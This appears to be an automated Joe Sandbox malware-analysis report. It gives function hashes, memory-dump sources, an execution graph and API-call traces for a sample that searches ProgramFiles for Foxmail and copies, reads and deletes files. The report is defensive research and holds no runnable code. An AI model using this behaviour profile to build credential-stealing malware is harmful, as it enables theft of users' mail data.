                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XRq$XRq$tPq$$q
                                                                    • API String ID: 0-1549039314
                                                                    • Opcode ID: 02e3944d6a057f7dee76961c61eb5355ba2990e4be5ab93866fc4d3ee709ed48
                                                                    • Instruction ID: 94d5e0b62e73d79943e916d38f80e06174ceb9811db31963f59cc6cf364c9aff
                                                                    • Opcode Fuzzy Hash: 02e3944d6a057f7dee76961c61eb5355ba2990e4be5ab93866fc4d3ee709ed48
                                                                    • Instruction Fuzzy Hash: E441A2B0A00225DFCB28AE24C144AA7B7F2EF45210F1989A9E8166B3E1C733DD41CFD1
                                                                    Function 076036A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q
                                                                    • API String ID: 0-4102054182
                                                                    • Opcode ID: 3f73a2d807feae8efdfeaeea5a88e7ccd8e2f84984b71a7f36c2dcac456ee25f
                                                                    • Instruction ID: f7060d27e3f0d6ac90851ccc5ca97f28d06fc53edd5691f5fe72271582fb1548
                                                                    • Opcode Fuzzy Hash: 3f73a2d807feae8efdfeaeea5a88e7ccd8e2f84984b71a7f36c2dcac456ee25f
                                                                    • Instruction Fuzzy Hash: 53214CF6320206ABEB3C557B981572767D69BC6613F24842EA507CB3C1DD71C80183A5
                                                                    Function 0760A334 Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q
                                                                    • API String ID: 0-4102054182
                                                                    • Opcode ID: 1893cea0096203c2178067e7379d64bcd3e64137fb6a2796e323a01b760a59a6
                                                                    • Instruction ID: cc60cb4f083afb498cadfedc717d90e823c3664fa05500843238dd440755638c
                                                                    • Opcode Fuzzy Hash: 1893cea0096203c2178067e7379d64bcd3e64137fb6a2796e323a01b760a59a6
                                                                    • Instruction Fuzzy Hash: A521D1B5904306CFCB298EE4E5452BBBBB4EB41290F19C07BD806CB282DB74D559C7E2
                                                                    Function 07609370 Relevance: 5.1, Strings: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0#Fq$4'q$4'q$X#j
                                                                    • API String ID: 0-100784376
                                                                    • Opcode ID: 2c069591b5830080a1b6cbee893bfa95bfec2df55d61b1e25e5457935f8b980f
                                                                    • Instruction ID: 0a10037f78e7c7a60e467cc5c451f91d5718664f4c9eab6ec22b49c4608aa9d5
                                                                    • Opcode Fuzzy Hash: 2c069591b5830080a1b6cbee893bfa95bfec2df55d61b1e25e5457935f8b980f
                                                                    • Instruction Fuzzy Hash: 1A11E6F160A352DFC72E1635E4101A76F635B86710B294197D9438B2D7CA31BC42CBE3
                                                                    Function 07609270 Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$h#j$$q
                                                                    • API String ID: 0-1248868988
                                                                    • Opcode ID: 6ffff6a4e0523d0974e3b6aee82fec68016cd73e8848ad974ce927c835a43a2e
                                                                    • Instruction ID: 1216069e4dcd80525042a5dfb5f026c480d518f8c2df68f45677505f46a62ebc
                                                                    • Opcode Fuzzy Hash: 6ffff6a4e0523d0974e3b6aee82fec68016cd73e8848ad974ce927c835a43a2e
                                                                    • Instruction Fuzzy Hash: 1811E2F16293519FC73A563928146A33B635B87300B2B4097E9538B2DBC935FC85C3E2
                                                                    Function 07600308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$$q$$q
                                                                    • API String ID: 0-3199993180
                                                                    • Opcode ID: 42197dbe1d55b5d51401a00c30c10ceeb8e3590e539f6bdb6c20412e98c30a3d
                                                                    • Instruction ID: 7041648665d3da590ccb47cb508ec6d59b76ed36b636f47d521a681cf1934bf8
                                                                    • Opcode Fuzzy Hash: 42197dbe1d55b5d51401a00c30c10ceeb8e3590e539f6bdb6c20412e98c30a3d
                                                                    • Instruction Fuzzy Hash: 8C01A76160D3974FD72F1274682025A6FB26F8355072E81D7D486DF3E7CA644D0683A7

                                                                    Execution Graph

                                                                    Execution Coverage:1.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0.5%
                                                                    Total number of Nodes:214
                                                                    Total number of Limit Nodes:5
                                                                    execution_graph 9046 1f751c5b 9047 1f751c6b ___scrt_fastfail 9046->9047 9050 1f7512ee 9047->9050 9049 1f751c87 9051 1f751324 ___scrt_fastfail 9050->9051 9052 1f7513b7 GetEnvironmentVariableW 9051->9052 9076 1f7510f1 9052->9076 9055 1f7510f1 57 API calls 9056 1f751465 9055->9056 9057 1f7510f1 57 API calls 9056->9057 9058 1f751479 9057->9058 9059 1f7510f1 57 API calls 9058->9059 9060 1f75148d 9059->9060 9061 1f7510f1 57 API calls 9060->9061 9062 1f7514a1 9061->9062 9063 1f7510f1 57 API calls 9062->9063 9064 1f7514b5 lstrlenW 9063->9064 9065 1f7514d2 9064->9065 9066 1f7514d9 lstrlenW 9064->9066 9065->9049 9067 1f7510f1 57 API calls 9066->9067 9068 1f751501 lstrlenW lstrcatW 9067->9068 9069 1f7510f1 57 API calls 9068->9069 9070 1f751539 lstrlenW lstrcatW 9069->9070 9071 1f7510f1 57 API calls 9070->9071 9072 1f75156b lstrlenW lstrcatW 9071->9072 9073 1f7510f1 57 API calls 9072->9073 9074 1f75159d lstrlenW lstrcatW 9073->9074 9075 1f7510f1 57 API calls 9074->9075 9075->9065 9077 1f751118 ___scrt_fastfail 9076->9077 9078 1f751129 lstrlenW 9077->9078 9089 1f752c40 9078->9089 9081 1f751177 lstrlenW FindFirstFileW 9083 1f7511e1 9081->9083 9084 1f7511a0 9081->9084 9082 1f751168 lstrlenW 9082->9081 9083->9055 9085 1f7511c7 FindNextFileW 9084->9085 9086 1f7511aa 9084->9086 9085->9084 9088 1f7511da FindClose 9085->9088 9086->9085 9091 1f751000 9086->9091 9088->9083 9090 1f751148 lstrcatW lstrlenW 9089->9090 9090->9081 9090->9082 9092 1f751022 ___scrt_fastfail 9091->9092 9093 1f7510af 9092->9093 9094 1f75102f lstrcatW lstrlenW 9092->9094 9095 1f7510b5 lstrlenW 9093->9095 9106 1f7510ad 9093->9106 9096 1f75106b lstrlenW 9094->9096 9097 1f75105a lstrlenW 9094->9097 9122 1f751e16 9095->9122 9108 1f751e89 lstrlenW 9096->9108 9097->9096 9100 1f751088 GetFileAttributesW 9102 1f75109c 9100->9102 9100->9106 9101 1f7510ca 9103 1f751e89 5 API calls 9101->9103 9101->9106 9102->9106 9114 1f75173a 9102->9114 9105 1f7510df 9103->9105 9127 1f7511ea 9105->9127 9106->9086 9109 1f752c40 ___scrt_fastfail 9108->9109 9110 1f751ea7 lstrcatW lstrlenW 9109->9110 9111 1f751ed1 lstrcatW 9110->9111 9112 1f751ec2 9110->9112 9111->9100 9112->9111 9113 1f751ec7 lstrlenW 9112->9113 9113->9111 9115 1f751747 ___scrt_fastfail 9114->9115 9142 1f751cca 9115->9142 9119 1f75199f 9119->9106 9120 1f751824 ___scrt_fastfail _strlen 9120->9119 9162 1f7515da 9120->9162 9123 1f751e29 9122->9123 9126 1f751e4c 9122->9126 9124 1f751e2d lstrlenW 9123->9124 9123->9126 9125 1f751e3f lstrlenW 9124->9125 9124->9126 9125->9126 9126->9101 9128 1f75120e ___scrt_fastfail 9127->9128 9129 1f751e89 5 API calls 9128->9129 9130 1f751220 GetFileAttributesW 9129->9130 9131 1f751235 9130->9131 9132 1f751246 9130->9132 9131->9132 9134 1f75173a 35 API calls 9131->9134 9133 1f751e89 5 API calls 9132->9133 9135 1f751258 9133->9135 9134->9132 9136 1f7510f1 56 API calls 9135->9136 9137 1f75126d 9136->9137 9138 1f751e89 5 API calls 9137->9138 9139 1f75127f ___scrt_fastfail 9138->9139 9140 1f7510f1 56 API calls 9139->9140 9141 1f7512e6 9140->9141 9141->9106 9143 1f751cf1 ___scrt_fastfail 9142->9143 9144 1f751d0f CopyFileW CreateFileW 9143->9144 9145 1f751d55 GetFileSize 9144->9145 9146 1f751d44 DeleteFileW 9144->9146 9147 1f751ede 22 API calls 9145->9147 9151 1f751808 9146->9151 9148 1f751d66 ReadFile 9147->9148 9149 1f751d94 CloseHandle DeleteFileW 9148->9149 9150 1f751d7d CloseHandle DeleteFileW 9148->9150 9149->9151 9150->9151 9151->9119 9152 1f751ede 9151->9152 9154 1f75222f 9152->9154 9155 1f75224e 9154->9155 9157 1f752250 9154->9157 9170 1f75474f 9154->9170 9175 1f7547e5 9154->9175 9155->9120 9158 1f752908 9157->9158 9182 1f7535d2 9157->9182 9159 1f7535d2 __CxxThrowException@8 RaiseException 9158->9159 9161 1f752925 9159->9161 9161->9120 9163 1f75160c _strcat _strlen 9162->9163 9164 1f75163c lstrlenW 9163->9164 9270 1f751c9d 9164->9270 9166 1f751655 lstrcatW lstrlenW 9167 1f751678 9166->9167 9168 1f751693 ___scrt_fastfail 9167->9168 9169 1f75167e lstrcatW 9167->9169 9168->9120 9169->9168 9185 1f754793 9170->9185 9173 1f75478f 9173->9154 9174 1f754765 9191 1f752ada 9174->9191 9181 1f7556d0 _abort 9175->9181 9176 1f75570e 9204 1f756368 9176->9204 9178 1f7556f9 RtlAllocateHeap 9179 1f75570c 9178->9179 9178->9181 9179->9154 9180 1f75474f _abort 7 API calls 9180->9181 9181->9176 9181->9178 9181->9180 9184 1f7535f2 RaiseException 9182->9184 9184->9158 9186 1f75479f ___DestructExceptionObject 9185->9186 9198 1f755671 RtlEnterCriticalSection 9186->9198 9188 1f7547aa 9199 1f7547dc 9188->9199 9190 1f7547d1 _abort 9190->9174 9192 1f752ae5 IsProcessorFeaturePresent 9191->9192 9193 1f752ae3 9191->9193 9195 1f752b58 9192->9195 9193->9173 9203 1f752b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9195->9203 9197 1f752c3b 9197->9173 9198->9188 9202 1f7556b9 RtlLeaveCriticalSection 9199->9202 9201 1f7547e3 9201->9190 9202->9201 9203->9197 9207 1f755b7a GetLastError 9204->9207 9208 1f755b93 9207->9208 9209 1f755b99 9207->9209 9226 1f755e08 9208->9226 9213 1f755bf0 SetLastError 9209->9213 9233 1f75637b 9209->9233 9214 1f755bf9 9213->9214 9214->9179 9218 1f755bb9 9221 1f755be7 SetLastError 9218->9221 9219 1f755bb3 9240 1f75571e 9219->9240 9220 1f755bcf 9253 1f75593c 9220->9253 9221->9214 9224 1f75571e _free 17 API calls 9225 1f755be0 9224->9225 9225->9213 9225->9221 9258 1f755c45 9226->9258 9228 1f755e2f 9229 1f755e47 TlsGetValue 9228->9229 9230 1f755e3b 9228->9230 9229->9230 9231 1f752ada _ValidateLocalCookies 5 API calls 9230->9231 9232 1f755e58 9231->9232 9232->9209 9238 1f756388 _abort 9233->9238 9234 1f7563c8 9237 1f756368 __dosmaperr 19 API calls 9234->9237 9235 1f7563b3 RtlAllocateHeap 9236 1f755bab 9235->9236 9235->9238 9236->9219 9246 1f755e5e 9236->9246 9237->9236 9238->9234 9238->9235 9239 1f75474f _abort 7 API calls 9238->9239 9239->9238 9241 1f755752 __dosmaperr 9240->9241 9242 1f755729 HeapFree 9240->9242 9241->9218 9242->9241 9243 1f75573e 9242->9243 9244 1f756368 __dosmaperr 18 API calls 9243->9244 9245 1f755744 GetLastError 9244->9245 9245->9241 9247 1f755c45 _abort 5 API calls 9246->9247 9248 1f755e85 9247->9248 9249 1f755ea0 TlsSetValue 9248->9249 9250 1f755e94 9248->9250 9249->9250 9251 1f752ada _ValidateLocalCookies 5 API calls 9250->9251 9252 1f755bc8 9251->9252 9252->9219 9252->9220 9264 1f755914 9253->9264 9259 1f755c71 9258->9259 9260 1f755c75 __crt_fast_encode_pointer 9258->9260 9259->9260 9261 1f755ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 9259->9261 9263 1f755c95 9259->9263 9260->9228 9261->9259 9262 1f755ca1 GetProcAddress 9262->9260 9263->9260 9263->9262 9265 1f755854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 9264->9265 9266 1f755938 9265->9266 9267 1f7558c4 9266->9267 9268 1f755758 _abort 20 API calls 9267->9268 9269 1f7558e8 9268->9269 9269->9224 9271 1f751ca6 _strlen 9270->9271 9271->9166 9014 1f75c7a7 9015 1f75c7be 9014->9015 9019 1f75c82c 9014->9019 9015->9019 9026 1f75c7e6 GetModuleHandleA 9015->9026 9017 1f75c835 GetModuleHandleA 9020 1f75c83f 9017->9020 9018 1f75c872 9019->9017 9019->9018 9019->9020 9020->9019 9021 1f75c85f GetProcAddress 9020->9021 9021->9019 9022 1f75c7dd 9022->9019 9022->9020 9023 1f75c800 GetProcAddress 9022->9023 9023->9019 9024 1f75c80d VirtualProtect 9023->9024 9024->9019 9025 1f75c81c VirtualProtect 9024->9025 9025->9019 9027 1f75c7ef 9026->9027 9033 1f75c82c 9026->9033 9038 1f75c803 GetProcAddress 9027->9038 9029 1f75c7f4 9032 1f75c800 GetProcAddress 9029->9032 9029->9033 9030 1f75c835 GetModuleHandleA 9035 1f75c83f 9030->9035 9031 1f75c872 9032->9033 9034 1f75c80d VirtualProtect 9032->9034 9033->9030 9033->9031 9033->9035 9034->9033 9036 1f75c81c VirtualProtect 9034->9036 9035->9033 9037 1f75c85f GetProcAddress 9035->9037 9036->9033 9037->9033 9039 1f75c82c 9038->9039 9040 1f75c80d VirtualProtect 9038->9040 9042 1f75c835 GetModuleHandleA 9039->9042 9043 1f75c872 9039->9043 9040->9039 9041 1f75c81c VirtualProtect 9040->9041 9041->9039 9045 1f75c83f 9042->9045 9044 1f75c85f GetProcAddress 9044->9045 9045->9039 9045->9044

                                                                    Executed Functions

                                                                    Function 1F7510F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1F751137
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751151
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75115C
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75116D
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75117C
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751193
                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 1F7511D0
                                                                    • FindClose.KERNEL32(00000000), ref: 1F7511DB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                    • String ID:
                                                                    • API String ID: 1083526818-0
                                                                    • Opcode ID: fb41c68048b387da6ab59d20f57c93344aafe3af601f54b70fdb662b8d4358ba
                                                                    • Instruction ID: 0c3cf11bf962a274bec4cf5d6f56ca1d333e69abf1a3b63fc6ccef612ad7de6a
                                                                    • Opcode Fuzzy Hash: fb41c68048b387da6ab59d20f57c93344aafe3af601f54b70fdb662b8d4358ba
                                                                    • Instruction Fuzzy Hash: C02185719043586BD710EA64AC4CFDB7B9CEF84325F00092AF958D31A0EB71E659C7D6
                                                                    Function 1F7512EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1F751434
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1F751137
                                                                      • Part of subcall function 1F7510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751151
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75115C
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75116D
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75117C
                                                                      • Part of subcall function 1F7510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751193
                                                                      • Part of subcall function 1F7510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1F7511D0
                                                                      • Part of subcall function 1F7510F1: FindClose.KERNEL32(00000000), ref: 1F7511DB
                                                                    • lstrlenW.KERNEL32(?), ref: 1F7514C5
                                                                    • lstrlenW.KERNEL32(?), ref: 1F7514E0
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F75150F
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F751521
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F751547
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F751553
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F751579
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F751585
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F7515AB
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F7515B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                    • API String ID: 672098462-2938083778
                                                                    • Opcode ID: b51a46bfd6a0ae01a8492c8dd35c0ebf255435ba9c705b137b7a28ad20c47ee6
                                                                    • Instruction ID: ae02d905961fae0aca09e20346543e2b3a3e1e8dbd13bb392385086d34e9e5f1
                                                                    • Opcode Fuzzy Hash: b51a46bfd6a0ae01a8492c8dd35c0ebf255435ba9c705b137b7a28ad20c47ee6
                                                                    • Instruction Fuzzy Hash: 5781D675A10358A9DB20D7A0EC89FDF7379EF88710F000596F90CE7190EAB56A89CF95
                                                                    Function 1F75C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(1F75C7DD), ref: 1F75C7E6
                                                                    • GetModuleHandleA.KERNEL32(?,1F75C7DD), ref: 1F75C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F75C860
                                                                      • Part of subcall function 1F75C803: GetProcAddress.KERNEL32(00000000,1F75C7F4), ref: 1F75C804
                                                                      • Part of subcall function 1F75C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C816
                                                                      • Part of subcall function 1F75C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C82A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: f8506c45f0f9c3458f22b3b2522e2318170a48afa7bf428756c0f41c8f3cd5af
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: 75016410945F813CAB1082741C09BFA6FEC9B23760B101B96E100CF0B3E9A1B176C3F6
                                                                    Function 1F75C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 80 1f75c7a7-1f75c7bc 81 1f75c82d 80->81 82 1f75c7be-1f75c7c6 80->82 84 1f75c82f-1f75c833 81->84 82->81 83 1f75c7c8-1f75c7f6 call 1f75c7e6 82->83 92 1f75c86c 83->92 93 1f75c7f8 83->93 86 1f75c835-1f75c83d GetModuleHandleA 84->86 87 1f75c872 call 1f75c877 84->87 88 1f75c83f-1f75c847 86->88 88->88 91 1f75c849-1f75c84c 88->91 91->84 94 1f75c84e-1f75c850 91->94 97 1f75c86d-1f75c86e 92->97 95 1f75c85b-1f75c85e 93->95 96 1f75c7fa-1f75c7fc 93->96 98 1f75c856-1f75c85a 94->98 99 1f75c852-1f75c854 94->99 100 1f75c85f-1f75c860 GetProcAddress 95->100 96->97 101 1f75c7fe 96->101 102 1f75c866-1f75c86b 97->102 103 1f75c870 97->103 98->95 99->100 104 1f75c865 100->104 101->104 105 1f75c800-1f75c80b GetProcAddress 101->105 102->92 103->91 104->102 105->81 106 1f75c80d-1f75c81a VirtualProtect 105->106 107 1f75c82c 106->107 108 1f75c81c-1f75c82a VirtualProtect 106->108 107->81 108->107
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,1F75C7DD), ref: 1F75C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F75C860
                                                                      • Part of subcall function 1F75C7E6: GetModuleHandleA.KERNEL32(1F75C7DD), ref: 1F75C7E6
                                                                      • Part of subcall function 1F75C7E6: GetProcAddress.KERNEL32(00000000,1F75C7F4), ref: 1F75C804
                                                                      • Part of subcall function 1F75C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C816
                                                                      • Part of subcall function 1F75C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C82A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction ID: f6031ca2fc00e277d8993a9bed5be041339daf672f6e068aa30134831342a31b
                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction Fuzzy Hash: 43210662448FC26FE7118BB45C04BA67FD89B17360F190796D140CF163E5A9B4A6C3E6
                                                                    Function 1F75C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 109 1f75c803-1f75c80b GetProcAddress 110 1f75c82d 109->110 111 1f75c80d-1f75c81a VirtualProtect 109->111 114 1f75c82f-1f75c833 110->114 112 1f75c82c 111->112 113 1f75c81c-1f75c82a VirtualProtect 111->113 112->110 113->112 115 1f75c835-1f75c83d GetModuleHandleA 114->115 116 1f75c872 call 1f75c877 114->116 117 1f75c83f-1f75c847 115->117 117->117 119 1f75c849-1f75c84c 117->119 119->114 120 1f75c84e-1f75c850 119->120 121 1f75c856-1f75c85e 120->121 122 1f75c852-1f75c854 120->122 124 1f75c85f-1f75c865 GetProcAddress 121->124 122->124 126 1f75c866-1f75c86e 124->126 129 1f75c870 126->129 129->119
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,1F75C7F4), ref: 1F75C804
                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C816
                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C82A
                                                                    • GetModuleHandleA.KERNEL32(?,1F75C7DD), ref: 1F75C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F75C860
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                    • String ID:
                                                                    • API String ID: 2152742572-0
                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction ID: a04dfa5ba9cebcea805cf9e46324aed31fc2e00c982d5042a20d0676444dc943
                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction Fuzzy Hash: 37F0F055A89F813CFA1145B41C45FFA5FDC8A27660B101B96E210CF1A3E8A6B53683F6

                                                                    Non-executed Functions

                                                                    Function 0040351C Relevance: 72.2, APIs: 32, Strings: 9, Instructions: 464stringfilecomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
